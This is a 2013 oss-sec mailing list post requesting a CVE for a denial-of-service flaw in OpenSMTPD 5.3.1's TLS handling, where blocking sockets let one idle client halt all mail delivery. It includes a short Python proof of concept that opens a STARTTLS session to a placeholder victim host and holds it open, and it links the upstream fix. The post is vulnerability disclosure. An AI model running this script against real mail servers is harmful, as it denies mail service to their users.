oss-sec mailing list archives
CVE Request: DoS in OpenSMTPD TLS Support
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Sat, 18 May 2013 16:27:22 +0200
Hi Kurt, The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its sockets in blocking mode, allowing an attacker to prevent all mail delivery simply by holding a socket open. I discovered this accidentally, as I noticed my HP printer's smtp client would keep the connection indefinitely open after an unsuccessful authentication attempt, causing no more mail to be delivered until I SIGKILL'd my smtpd process or unplugged my printer. The following reproduces the attack trivially: #!/usr/bin/env python2 import smtplib import time print "[+] Connecting to server and initiating TLS" smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587) smtp.starttls() print "[+] No clients will be able to connect as long as this remains open." time.sleep(100000000) Apparently this was fixed recently upstream, noting "evil client" in the commit message: http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0 A snapshot has been posted to http://www.opensmtpd.org/archives/ , but no patch release has yet been made. Jason
Current thread:
- CVE Request: DoS in OpenSMTPD TLS Support Jason A. Donenfeld (May 18)
- Re: CVE Request: DoS in OpenSMTPD TLS Support Gilles Chehade (May 18)
- Re: Re: CVE Request: DoS in OpenSMTPD TLS Support Kurt Seifried (May 18)
- Re: CVE Request: DoS in OpenSMTPD TLS Support Jason A. Donenfeld (May 18)
- Re: Re: CVE Request: DoS in OpenSMTPD TLS Support Kurt Seifried (May 18)
- Re: Re: CVE Request: DoS in OpenSMTPD TLS Support Gilles Chehade (May 19)
- Re: CVE Request: DoS in OpenSMTPD TLS Support Gilles Chehade (May 18)